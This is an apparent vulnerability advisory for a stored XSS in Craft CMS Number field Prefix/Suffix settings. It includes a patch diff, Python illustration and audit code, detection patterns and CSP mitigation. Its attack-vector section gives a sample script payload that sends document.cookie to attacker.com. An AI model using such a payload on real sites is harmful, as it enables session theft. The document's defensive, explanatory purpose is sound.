CVE-2026-25496 Overview
CVE-2026-25496 is a stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS, a popular platform for creating digital experiences. The vulnerability exists in the Number field type settings, where the Prefix and Suffix values are rendered through the |md(inlineOnly=true)|raw Twig filter chain without HTML-encoding the input. This flaw allows attackers with administrative privileges to inject persistent scripts that execute when the Number field is displayed on users' profiles.
Critical Impact
Administrative users can inject persistent malicious scripts through Number field Prefix/Suffix settings, potentially compromising user sessions and data when the field is rendered on profile pages.
Affected Products
- Craft CMS versions 4.0.0-RC1 through 4.16.17
- Craft CMS versions 5.0.0-RC1 through 5.8.21
Discovery Timeline
- 2026-02-09 - CVE-2026-25496 published to NVD
- 2026-02-09 - Last updated in NVD database
Technical Details for CVE-2026-25496
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) stems from improper output encoding in Craft CMS's Number field type component. When administrators configure Number fields, they can specify Prefix and Suffix text values that are displayed alongside the numeric input. These values pass through the Twig templating engine using the |md(inlineOnly=true)|raw filter chain, which renders Markdown content but does not HTML-encode the value, so HTML and JavaScript embedded in it are emitted verbatim and execute in users' browsers.
The attack requires administrator-level privileges to configure the malicious field settings, but the payload persists and executes for any user who views a profile containing the affected Number field. This creates a privilege escalation vector where an administrator could potentially capture session tokens or perform actions on behalf of other users, including other administrators.
Root Cause
The root cause is insufficient output encoding in the Twig template file src/templates/_components/fieldtypes/Number/input.twig. The template uses the |md(inlineOnly=true)|raw filter combination to render the Prefix and Suffix values. While the |md filter processes Markdown syntax, the |raw filter marks the output as safe HTML without encoding, allowing any HTML and JavaScript embedded in the original input to render unescaped in the browser context.
Attack Vector
The attack vector is network-based and requires high privileges (administrator access) along with user interaction (victim viewing the affected profile page). An attacker with administrative access to Craft CMS could:
- Navigate to the Number field configuration settings
- Insert malicious JavaScript in the Prefix or Suffix field (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>)
- Save the field configuration
- Wait for users to view profile pages containing the Number field, triggering script execution
The following patch demonstrates the security fix implemented by the Craft CMS team:
<div class="flex">
{% if hasPrefix %}
<div aria-hidden="true">
- {{ prefix|t('site')|md(inlineOnly=true)|raw }}
+ {{ prefix|t('site')|md(inlineOnly=true,encode=true)|raw }}
</div>
{% endif %}
<div>
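Review bot: only the prefix branch is changed here; the advisory text says the Suffix value is rendered through the same |t('site')|md(inlineOnly=true)|raw chain, so the suffix output needs the identical encode=true change (or should be shown in the diff) before the fix can be considered complete. Note also that |raw is retained on the + line, so the template's safety now rests entirely on encode=true: the translated string must be HTML-encoded before the Markdown parse, and any future change that drops the parameter reintroduces the issue. A template test that renders a prefix containing `<` and asserts `&lt;` in the output would guard against that regression.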
Source: GitHub Commit Update
The fix adds the encode=true parameter to the md filter, so the value is HTML-encoded before the output is marked safe by |raw. Embedded markup is therefore displayed as literal text rather than interpreted by the browser, while Markdown formatting in the Prefix and Suffix continues to work.
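To make the difference between the two filter chains concrete, here is an added illustration (not Craft's code): a minimal inline-Markdown stand-in, used as an assumption in place of Craft's real parser, rendered once without and once with HTML-encoding the input first. The fixed variant assumes encode=true encodes the value before the Markdown parse, which is what the patched template relies on.

```python
import html
import re


def inline_markdown(text: str) -> str:
    """Tiny stand-in for an inline-only Markdown renderer (bold, italic, code).
    Assumption: Craft's real |md filter is a full parser; this only models the
    ordering of encode vs. parse that the fix depends on."""
    text = re.sub(r"\*\*(.+?)\*\*", r"<strong>\1</strong>", text)
    text = re.sub(r"\*(.+?)\*", r"<em>\1</em>", text)
    text = re.sub(r"`(.+?)`", r"<code>\1</code>", text)
    return text


def render_prefix_vulnerable(prefix: str) -> str:
    """Models |md(inlineOnly=true)|raw: Markdown is parsed and the result is
    emitted as-is, so any HTML inside the admin-supplied value survives."""
    return inline_markdown(prefix)


def render_prefix_fixed(prefix: str) -> str:
    """Models |md(inlineOnly=true, encode=true)|raw: the value is HTML-encoded
    first, then parsed, so only the renderer's own tags reach the browser
    while Markdown such as **bold** still works."""
    return inline_markdown(html.escape(prefix, quote=True))


def contains_raw_tag(rendered: str, tag: str) -> bool:
    """True if an unescaped <tag ...> is present in the rendered output."""
    return re.search(rf"<{tag}\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    # Constructed sample value: legitimate Markdown plus an injected tag.
    sample = "**USD** <script>x()</script>"
    print("vulnerable:", render_prefix_vulnerable(sample))
    print("fixed:     ", render_prefix_fixed(sample))
```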
Detection Methods for CVE-2026-25496
Indicators of Compromise
- Unexpected JavaScript code or HTML tags present in Number field Prefix or Suffix configuration values
- Anomalous outbound network requests originating from user browsers when viewing profile pages
- Audit log entries showing modifications to Number field settings with suspicious content patterns
- User reports of unexpected behavior or redirects when viewing profiles
Detection Strategies
- Implement content security policies (CSP) to detect and block inline script execution
- Monitor Craft CMS audit logs for field configuration changes containing script tags or event handlers
- Deploy web application firewall (WAF) rules to detect XSS patterns in administrative form submissions
- Conduct periodic database audits of field settings tables for malicious content
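The database audit suggested above, as an added example that is not part of the original advisory: it scans rows shaped like Craft's fields table (assumption: a `type` column holding the field class and a `settings` column holding JSON with `prefix` and `suffix` keys) and flags Number fields whose Prefix or Suffix contains an HTML tag, an inline event handler, or a javascript: URL. The sample rows are constructed for the example.

```python
import json
import re
from typing import Iterable, List, Tuple

# Patterns nobody expects in a currency or unit label: any HTML tag,
# an inline event-handler attribute, or a javascript: URL.
SUSPICIOUS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("javascript_url", re.compile(r"javascript\s*:", re.IGNORECASE)),
]

NUMBER_FIELD_TYPE = "craft\\fields\\Number"  # assumption: stored class name


def audit_number_fields(rows: Iterable[dict]) -> List[Tuple[str, str, str, str]]:
    """Return (handle, setting, reason, value) for each Number field whose
    prefix or suffix matches a suspicious pattern. Unparseable settings are
    reported too, since they also deserve a manual look."""
    findings = []
    for row in rows:
        if row.get("type") != NUMBER_FIELD_TYPE:
            continue
        settings = row.get("settings") or {}
        if isinstance(settings, str):
            try:
                settings = json.loads(settings)
            except json.JSONDecodeError:
                findings.append((row.get("handle"), "settings", "unparseable_json", settings))
                continue
        for key in ("prefix", "suffix"):
            value = settings.get(key)
            if not isinstance(value, str) or not value:
                continue
            for reason, pattern in SUSPICIOUS:
                if pattern.search(value):
                    findings.append((row["handle"], key, reason, value))
                    break  # one reason per setting is enough for triage
    return findings


# Constructed sample rows (not from any real installation).
SAMPLE_ROWS = [
    {"handle": "price", "type": NUMBER_FIELD_TYPE,
     "settings": json.dumps({"prefix": "$", "suffix": " USD", "decimals": 2})},
    {"handle": "weight", "type": NUMBER_FIELD_TYPE,
     "settings": json.dumps({"prefix": "", "suffix": "**kg**"})},
    {"handle": "score", "type": NUMBER_FIELD_TYPE,
     "settings": json.dumps({"prefix": "<script>x()</script>", "suffix": "pts onclick=x()"})},
    {"handle": "bio", "type": "craft\\fields\\PlainText",
     "settings": json.dumps({"placeholder": "<not a Number field>"})},
]
```

Running `audit_number_fields` over rows pulled from the fields table (or over the field entries in project config) yields a short triage list; the weight row shows that ordinary Markdown emphasis is not flagged.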
Monitoring Recommendations
- Enable detailed logging for Craft CMS administrative actions, particularly field configuration changes
- Configure alerts for CSP violation reports that may indicate attempted XSS exploitation
- Monitor for unusual authentication patterns that could suggest session hijacking from XSS attacks
- Review Number field configurations during routine security assessments
How to Mitigate CVE-2026-25496
Immediate Actions Required
- Upgrade Craft CMS 4.x installations to version 4.16.18 or later immediately
- Upgrade Craft CMS 5.x installations to version 5.8.22 or later immediately
- Audit existing Number field configurations for any suspicious Prefix or Suffix values
- Review administrative access logs for unauthorized field configuration changes
Patch Information
The vulnerability is fully remediated in Craft CMS versions 4.16.18 and 5.8.22. The security patch modifies the Number field input template to include proper HTML encoding via the encode=true parameter in the Markdown filter. Detailed information about the fix is available in the GitHub Security Advisory GHSA-9f5h-mmq6-2x78 and the patched release 5.8.22.
Workarounds
- Restrict administrative access to trusted users only until the patch can be applied
- Implement a strict Content Security Policy (CSP) with script-src 'self' to mitigate XSS impact
- Manually audit and sanitize all existing Number field Prefix and Suffix values
- Consider disabling Number field customization features temporarily in high-risk environments
# Example CSP header configuration for nginx
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none';" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.